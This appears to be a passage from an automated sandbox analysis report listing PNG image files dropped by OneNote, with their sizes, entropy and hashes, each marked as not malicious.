                                                                                                                                                                                                          SHA-256:DDF6A1D5B29BD69C65A148B1247FDE8389CC56865E4398E4CBDCBD68A6555043
                                                                                                                                                                                                          SHA-512:99B4109439D9A688D7747C6847E0FF7399CDA01A89C3181789F913E757A82EE4727F95E506F4B01930EFC7C6E229B94BB89E385B56BC009AB5CFE332585660C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 213 x 85, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1924
                                                                                                                                                                                                          Entropy (8bit):7.836744258175623
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:rloPN36BoJ9JK5lncTww67QKf5wX5YgM5s6cahePwnR6+eA9zQU13ALcVz7wTQ8U:rYN31JH6lcbjMW5Ytmyqwp9H7wY
                                                                                                                                                                                                          MD5:B1FDE66F75507567B5F0C6C07B01A3A1
                                                                                                                                                                                                          SHA1:80B8E6A923E853232F66C874367E90B5C9CAD7AE
                                                                                                                                                                                                          SHA-256:B9C82D2F31BBE409D159EE3C9129CBAAC7C6F6C81637AB9B6DAB3C11AA74B7F1
                                                                                                                                                                                                          SHA-512:FC8C6038D3C2F5765D7524E969574ACD10AF6FCCFD45FE7C6DD4A8C2669B13EE3FB1A8833E94A046AB7037018170B5B87B1A2742E0E10557C413AD634BDF343E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11886
                                                                                                                                                                                                          Entropy (8bit):7.946442244439929
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:sqNuEpzsnKxkfLaZCdMh+cLApmRausyZwYMAisQKShDBlhr34ckckcZ:JNu6DMLaZsMhtLAIa0wYMAvI5V4DDQ
                                                                                                                                                                                                          MD5:875CFB3B5C3619253223731E8C9879E5
                                                                                                                                                                                                          SHA1:6372F4F5BEB6EEAE3EDBE5B62EE73039B40AD01E
                                                                                                                                                                                                          SHA-256:CC69BAE5D2C8F56B28BA4E3C6A11F57C4E8CCCE69943ACFBE7E63B4FC90EE5F2
                                                                                                                                                                                                          SHA-512:47F45A3275B8454F8000F4567153DD7D4AF3012005D8E34CB18AED6AD69083BEC753E607F275FBF3EFCCB7BA00310A04ADFBD5FA5B73E6BBE47CE73901C35CA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 171 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2270
                                                                                                                                                                                                          Entropy (8bit):7.845368393313232
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:3Cxnazs22lovji2Ez2iqBU2C+hJWizJNzIu1coqAYClBeMsk1:3dm2Ez2iUhBzhyjAxqQ
                                                                                                                                                                                                          MD5:6EFE6733E10E011FFDD6711B5F37C9E2
                                                                                                                                                                                                          SHA1:C72549E824EAD899944A38C46FBC28BDCDAAD611
                                                                                                                                                                                                          SHA-256:92B5056DAA03DF3EA85AF49FFE4F9CFE8699BDF3539576A99F02418FF49AD9CB
                                                                                                                                                                                                          SHA-512:EC14B553A5780CD9B33D438CE13A6932DE43E346D8D2DEC8D093A6A2048675423948F8E2C604A73460980C3C68D9276B65D76C2A6BC7B24FDF10CA92FDA2583E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):16003
                                                                                                                                                                                                          Entropy (8bit):7.959532793770661
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:1l+zN+iNurNE/tBdEC/vkape2XHYdhOm+Bl6C4:L+zN+iNurGNEC3fpe2X8Pa+
                                                                                                                                                                                                          MD5:3A5CD52E925A7C4A345047D8F06C3C41
                                                                                                                                                                                                          SHA1:9C02828D83206BBD3EB58930C8C65A6CA5DBCF40
                                                                                                                                                                                                          SHA-256:477277E8CAAAE1D3B3EAB5B3660239AEEABC433743A191727B1A71E529872AC7
                                                                                                                                                                                                          SHA-512:8D8B6AC645ECC7C8BD374E6190819006C71AC0B5993419C42463009116214E5EC4B4235D94B4AE4CDA132E7DDA9807ADC51525824AC5F12696517FFC8890891E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 454 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13241
                                                                                                                                                                                                          Entropy (8bit):7.931391290415517
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:a99pmP85w/MAMszG+iHGgrw8Ld+9aEsjQR:mgP85AMs6+UtrX+9mjQR
                                                                                                                                                                                                          MD5:01367FEEE0A83E8765E971E0D3740900
                                                                                                                                                                                                          SHA1:CAE1FD22CE2539FA2ACC0242C615CB7EA3F866E1
                                                                                                                                                                                                          SHA-256:18B8E53505DA3C412890F4D74AE2A6B26C4B0827E15E830F92A024D292AF20ED
                                                                                                                                                                                                          SHA-512:8CFBDC014C42AE6417038B80424D2E9FBDDD7DFDDF579E349C3C17C9B52AF33A72463154D29539457C4ADAB2DB00CC28A67902FA8D9209E4AF00EDD46D52E5CA
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 164 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4190
                                                                                                                                                                                                          Entropy (8bit):7.94161730428269
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:GHfueo3dRLZKOSYDzGsEgfB9nqS0WKt/z2jOrrz7yrT7N:8A6AzZfBtqS0WKNC2vyx
                                                                                                                                                                                                          MD5:8B3AEC1986A522951942BA72B85CCAA0
                                                                                                                                                                                                          SHA1:7E0DC78FC65EE4C804A4B0C72AA53E2DFDF26C14
                                                                                                                                                                                                          SHA-256:8B02CEC726DECF033B67689F369FDE1002ACFD5F8C32E0F248AC575997204F2F
                                                                                                                                                                                                          SHA-512:8EE1A1F6F0023EB4F60760C2E23EAFD56E6D298CAB49D819CF1D62C0CCF608D4211D3767856255F7CF8FF45AD835FE5475EB92C608989C522CD48D00A050B189
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 162 x 89, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4081
                                                                                                                                                                                                          Entropy (8bit):7.943373267196131
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:KQJAeRumk2zXWySlEmWL9zi6wknB4qLx+ppNhQrW8Oy:Ke9S482LE6wQB6pNeqi
                                                                                                                                                                                                          MD5:29B87BEEC5D3899824AA390530CD47FB
                                                                                                                                                                                                          SHA1:55108E8E5692E4444F72EE5CEB91915E7A2AEFC8
                                                                                                                                                                                                          SHA-256:F00E4F1C9B1D9ABEAAEC8E5CAB02A07FD74F00ACE15E36C6F6469DE5AB07A9FC
                                                                                                                                                                                                          SHA-512:1A5AD45BBA8C29C32CDD3C4D1E460C30ECA305D851FAAC73DF165306BC338337525680B9906D367A0CD3852B9D2DAAA8FD0603276BA969495B4E29C7EC8A3530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 277, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):22634
                                                                                                                                                                                                          Entropy (8bit):7.974332204835705
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:5ojjyi45m1/9gyhgFsH1ud103Pl39o0qjfsH37mNHy7QPaNbZy0:+r45m1/BWKy10tN22rmNHycobE0
                                                                                                                                                                                                          MD5:548D234C9AB4021CA5FAB7BF22502465
                                                                                                                                                                                                          SHA1:2F7495D250DC86EA99473CC342D164B859926021
                                                                                                                                                                                                          SHA-256:7D549C3418CD90F42571D00936B23D242837CE2A8B19FC4C719E182ECB2624C6
                                                                                                                                                                                                          SHA-512:261523F5EAE6FCE2829B53AAC5938B1A0021C119E00CE82EFFDBD690FE71064E0F3B313ED1AB2F67A16C488AD5B1A91F5AF98029D88A7896F271C108410D42C5
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):17289
                                                                                                                                                                                                          Entropy (8bit):7.962998633267186
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:ruwwXKZuqnOnZprU3+OXBruY4UkcY+TpI/BSqCrEoMXMEr3KbzHIDqqAmk+xob:tGcxE4PBruV3Uy5SqCAoMXzrQHoqAk+m
                                                                                                                                                                                                          MD5:708E8EB906BC105CCA0535AE669AA651
                                                                                                                                                                                                          SHA1:38D82DEDFE97D3001188C2E18FE13BD741FD520F
                                                                                                                                                                                                          SHA-256:1C3D07765294566E17270D0F3B9257A3DB7905D4E7EF746AEE80CD591CE0308F
                                                                                                                                                                                                          SHA-512:1EFC74C28190DEE2D2732390B74049A1B120F05EFB8DC6925207C6990AD20450FFAB40249899A9DBB82E8F92A61F770E120A450CAAC7F8C5F0742586CCE0EDB6
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 452 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13737
                                                                                                                                                                                                          Entropy (8bit):7.916899917415529
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:jgxmx2Fa/+76A6M6Y7rSYRv47cwbkkapeIiRmDGd+gUwOSpQ:KgyoWrJWRkkRXmad+gE8Q
                                                                                                                                                                                                          MD5:830632032C7DDBCCDE126F4BAE935540
                                                                                                                                                                                                          SHA1:9FEF1DA9FF1D7762B779553B5F873BE54C8D01EF
                                                                                                                                                                                                          SHA-256:2328D09EC845433DC31808FD6B12616F1D28B9B3BA7DD969ADEB6C32D8EB049A
                                                                                                                                                                                                          SHA-512:5C17EF9A0063499F2C34FAB2C4D968D29E20F20868921FA914E5737995AA0C166F224995109FF7ACA57B5B0F8647715DC670C4AEE385F61B5F8E6E8422C49EA8
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 185 x 76, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2332
                                                                                                                                                                                                          Entropy (8bit):7.8822150338370776
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:jB5Gg4vMs30WIn5IVeRy1bY7DqbqQBAeNjukXlN4AXat:PGYuEWV/YH7e1uA0AXat
                                                                                                                                                                                                          MD5:91CB7F1273AA003076401081B8A22237
                                                                                                                                                                                                          SHA1:5157144069E7D2FDAE60B397BE5851E75BDF7707
                                                                                                                                                                                                          SHA-256:80682DD6472E8D1136BC5E20F6DE87B595562414B19EAB8E965736FE992921B0
                                                                                                                                                                                                          SHA-512:5A8E3C0ED0DB94BFE359C63793F12F3D7B3C37F3A13A5C96634BA1DC8C9E50FB1142FE4752FD9FBFA39A682F78C54AF868AD337EAA787801FE5F66D8F55A8196
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11332
                                                                                                                                                                                                          Entropy (8bit):7.9324721568775285
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:vpXZavBpl00n1Pt7JquG9GYHDK/5cxektxMQjcie9ZZkx30eXJIb8FKRN:vpZaDyc1P1Je9G62/5clpjre9nQkeXJY
                                                                                                                                                                                                          MD5:31579CA3352DF8FA4E3E7F48C7CDF672
                                                                                                                                                                                                          SHA1:AA682A3C781BF8EE43B5EDC9718E64CB79135F25
                                                                                                                                                                                                          SHA-256:B0E7824BEE2C896279457D87E61E902431BEB528D830524CC4DFAE126E89FC24
                                                                                                                                                                                                          SHA-512:782FF9492E3ECB11C72D316DDD94D1F3E94CD908FC9452A37DA6CA30ABCFE9AB2BCCED8583A569DA68626BCEC730408AF86997E295637BF64AFF5BC768F3E309
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 167 x 92, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4181
                                                                                                                                                                                                          Entropy (8bit):7.943341403425058
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:b6JWqvCl45Da8kuGzhRwZvwIutfij19MQ8EpW14LBGJVCq:b6JTCl45DalsBws1R8914V5q
                                                                                                                                                                                                          MD5:817D5A35EDB2B0E052194D4F49FDA19C
                                                                                                                                                                                                          SHA1:FA6CB2016C5F43B76102B63D60359139227E07EA
                                                                                                                                                                                                          SHA-256:0A87B8418B7F8E6E117BADDA11D7CDD38B8B7320C6BA3D3E9AF93EB9ACB2CE14
                                                                                                                                                                                                          SHA-512:E0686BDBFC589401F0EAAE2B1598199EFA285F8392742B1C928B9274088804B23DCB584B6FEF68CE6D7E54DFF9C10338104F4C0F3F80A04471F0B2E8F9935CC0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 221 x 77, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2599
                                                                                                                                                                                                          Entropy (8bit):7.903700862190034
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:PmCwDJh8w9JewaF2zQNXXj8zq1KM43sxXxjYbTgJW1MFsrJ075CawGjGj:P1Ah8UewaFcgz82Kx8xXNYb3id/yj
                                                                                                                                                                                                          MD5:E88131C9AAC52649FF044905ACAB9B76
                                                                                                                                                                                                          SHA1:34AE73B9165CBED0DDF33AC20E4B3E7D622C19BF
                                                                                                                                                                                                          SHA-256:30F22340F582F9A352A7ED3048D1088F178E83CCAACAC1CCFD86852C8F9C78E3
                                                                                                                                                                                                          SHA-512:97AFE8F3A2A3138613934AC737C390A35F6757BFC3D381EA7C7CD148F739932380DCD46D0BA6F590C274F8BFB4D4286B3C0433AA69E090102A8A9ABDD7C97EB1
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 232 x 50, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1570
                                                                                                                                                                                                          Entropy (8bit):7.780157858994452
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:r+em8Tlk2APr2fEd72tTqiVJlcLzqeVzYwS:r+erTlk5S+zoyGahS
                                                                                                                                                                                                          MD5:EF9AA5B2ADBE5DF68AC4F4D716DF7708
                                                                                                                                                                                                          SHA1:363B93AAAB9DB2832F6CA0EE3C27C9310C344BA8
                                                                                                                                                                                                          SHA-256:3D94FCC4821A135ABAAE6579011441B94F9C04DAD1E66BB5211B0C019A5968B9
                                                                                                                                                                                                          SHA-512:EC9B024AEA46F7B97D14F0A7E12704D09B85F0017CC9E273CE50F2F889DFDAE81DE549CCD546BBB8F8BAAAAAB7781FEF77BF783E02CCC9605304552F7DD5903D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 340 x 79, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4490
                                                                                                                                                                                                          Entropy (8bit):7.928016176674318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:WXKr7Xwf6Obg+XaGOnsjbbGSb+ydWtRvEOhDE6XqPeosv02tR45boo:3rTUgXZnsHKSb+n+8DdKlwm
                                                                                                                                                                                                          MD5:7F161B19B937AB48D4FD2F6E5E16FDBD
                                                                                                                                                                                                          SHA1:BDCE4F1C73E87E609A7FDF245A512CA4F73B35B9
                                                                                                                                                                                                          SHA-256:C863C5E71D1116D69561BD0637F4FE4C4240E9CED05B8A5B056073AD13E6495D
                                                                                                                                                                                                          SHA-512:E915B76FAAC9512D2AD11CF4E4530A19BEA1C7D8508BC218C69CB041F1EEABA3E2E03B1D56E61B032A6418829752C21B8354AF1335466D7E1528A06E6742A461
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 453 x 278, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):11449
                                                                                                                                                                                                          Entropy (8bit):7.91552812501629
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:192:/zgGDSJ0ke0kBER0C31jm1OSZi6/ccccccc3zzRmKHDr1NFnAaLJ5rBX8iaD7:/UGe6m7XdJS86kvRBHD5/nAa95rB9aD7
                                                                                                                                                                                                          MD5:163E6791C87E4999C343EC5E23843B15
                                                                                                                                                                                                          SHA1:43CE3BAE19E22876483A7FD0E93DB45790373600
                                                                                                                                                                                                          SHA-256:DEB2B126977EA150E49CDB3ACF4F5387639C7B7B5583454EDF55ADF83DFAB720
                                                                                                                                                                                                          SHA-512:98BE1F4684F99A9FD2F313B09A113B5C310EC8BA8EB0EBF5FD69765E5B48B001D39999E3F25A7E76C7344DCF57B4F0BF2E4614FB0E0DFCCB6F02E6D1CAAF7FDD
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 165 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):3679
                                                                                                                                                                                                          Entropy (8bit):7.931319059366604
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:tT+LtoQ9jsUBsnwlDGThUe8ww2iJiGEjdKKnnE+Gh:V+Ltt5GwlDQhUe8ww2iJi7MKnnE+K
                                                                                                                                                                                                          MD5:995CEACAD563F849C4142B6A6F29F081
                                                                                                                                                                                                          SHA1:44CB3B867CD2917541B7D5AAED2F14F10FEBB0FD
                                                                                                                                                                                                          SHA-256:3691FB8C60EA1B827092F05FBB1807E34726016C6FF56698D7B81C44D519D22A
                                                                                                                                                                                                          SHA-512:3C8EFEB966B075D06D8344483352BF92C9292F9970C9377BE254EB355EFAF017916737AECCDC704B84D532B7229F9908951A6F2CC3FAD810791CAB224401AD3D
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 127 x 138, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2232
                                                                                                                                                                                                          Entropy (8bit):7.837610270261933
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:dFQY2WmQbe+TukEC2KgYPsWOuWFk792oP/sWtGOK9Lc+rD0NTHj:3L+wKkEOgx3PG92Eqt9LczFD
                                                                                                                                                                                                          MD5:EDB5ED43CC6038500A54B90BEC493628
                                                                                                                                                                                                          SHA1:A8CD63F3914E4347F4C5552FB922C6C03917F45F
                                                                                                                                                                                                          SHA-256:9F3312E33EB78C6952B5A5D881BBD18751FCFAC41D648C6F053CE781342A504F
                                                                                                                                                                                                          SHA-512:4EBCEFD69A4C249AA3B0F00A954C4E463DA22FC9CA0B61A0DC46079B438138C509B22188D966FFF6599A3A604858BC4CC8FE6E0685A764E8E0477AB7A237DB32
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 749 x 126, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):13084
                                                                                                                                                                                                          Entropy (8bit):7.940058639272698
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:384:o4KSpFN6Ud4c3p2Il1yavNr5spYVJzimlfZ:wGN6Udv4IKavLBJz/r
                                                                                                                                                                                                          MD5:0693DABBBC411538D209F32E22F622F6
                                                                                                                                                                                                          SHA1:FB7E675406FA123CDB7E058D336742D6A2E8DC8E
                                                                                                                                                                                                          SHA-256:2DFB2E7A1A3AA43C673D2EE540D3C366CEB12105EB5441F98992FC06F4284013
                                                                                                                                                                                                          SHA-512:F07732660EC62DAE58EB02E2E9476007EA92BF826F642BCA547097136AEA01D29FF69D9B0CD0F5D65A5E15AA66CA4AA4804AA171A3504AAB198631C643C90C16
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 163 x 131, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):4847
                                                                                                                                                                                                          Entropy (8bit):7.950192613458318
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:96:JnieMJz5Tz/gKVp93jQvcv16kjOzbapFJBkjcMNBqmQzOG8qx1QKnse8T:JieMJzph13Evcv16RfapFLxMNBo8qxan
                                                                                                                                                                                                          MD5:A1A1017A6A7928761CEB56D1D950E123
                                                                                                                                                                                                          SHA1:28272E9C7F816A1CE8F2033FC00F489005332365
                                                                                                                                                                                                          SHA-256:72F066CD34EA71D0E1B28FB60D663B0372C5254E1A8239C94A164EEF9389DB88
                                                                                                                                                                                                          SHA-512:10F4557F102230126BC86CD4B49C93365C38D5CBEAC51F4691B90D861098866A2BDEFEBA507731D4FA14367FEE430453BD716157F9074EF643F2B949B09E1530
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 46 x 49, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1604
                                                                                                                                                                                                          Entropy (8bit):7.814570704154439
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:4gv2YZ4gWLpU9JcjREmXfFEV7NNkfKOgV60g0Z:KZgWLpSJcj+mPFGNkfngp
                                                                                                                                                                                                          MD5:3F1535054D4F9626F0EB10CEE47F076E
                                                                                                                                                                                                          SHA1:92EF4F27A33F7704952ECDBA4FA69C68FC32FD4B
                                                                                                                                                                                                          SHA-256:4AB29996D02D93CAD184DD05F7A027D00425B90F5657F1E51CC4C37297A0035A
                                                                                                                                                                                                          SHA-512:2E0EC758B2C28C8DB9F7B5EDBBE8130F049E66842F2F5CC1C013CF23F7C4443CD211BA297250471CDB4F91F1E3251C1E3F7E2151C576FD1A1AE6A36C3776C6E0
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 123 x 103, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):1657
                                                                                                                                                                                                          Entropy (8bit):7.80882577056055
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:24:q3kLWZefR0kKbfLnNhzzt+acvt2x6pBs/j+7QJU0QbDQ883ASaoUV4hNgq1rsyhy:q322nN+X11GDsg8831Uyhi/vf
                                                                                                                                                                                                          MD5:D5F7A65469623327F799B516ACBFFD2F
                                                                                                                                                                                                          SHA1:76C6333C14AF3A7EA091819953E6E12DC289A12C
                                                                                                                                                                                                          SHA-256:F476FAE1C6D79069239C471D182631AB343749C22B1A6990250465C7EC3738FE
                                                                                                                                                                                                          SHA-512:351B9E455E97E6247E64E4BC1B59C9524E70AE0D09D3B6FB96937378A70536483B00426EE69C3590DD415A8265D21FD031B524B90E4E86814EC9AD704E57793E
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 59 x 61, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
                                                                                                                                                                                                          Size (bytes):2210
                                                                                                                                                                                                          Entropy (8bit):7.86853667196985
                                                                                                                                                                                                          Encrypted:false
                                                                                                                                                                                                          SSDEEP:48:naUvGemgl0W5KMDRLEbGAnaHC7ew/fkDSCcE5FTaHWc:aerVlDRIewkXlrTa2c
                                                                                                                                                                                                          MD5:73E38124F94AD20A2F1571FBBE11AEEC
                                                                                                                                                                                                          SHA1:87FB8056DC7A0A3B70D51426771C4CCE2099CFE5
                                                                                                                                                                                                          SHA-256:A700B63B30CBBE5230CC5E977D651E178EA87E73EAB18C8D5FFB1362149ADDF7
                                                                                                                                                                                                          SHA-512:320FCE64DD6F975384BEC9267348CD5CD24A55B13BB09FEF1238C2216AD8ECABDCCC15601A079CE092ACFA4954829FFEB06FBB0631F6AE26E3A39E43C102048B
                                                                                                                                                                                                          Malicious:false
                                                                                                                                                                                                          Process:C:\Program Files (x86)\Microsoft Office\Office16\ONENOTE.EXE
                                                                                                                                                                                                          File Type:PNG image data, 563 x 211, 8-bit/color RGB, non-interlaced
                                                                                                                                                                                                          Category:dropped
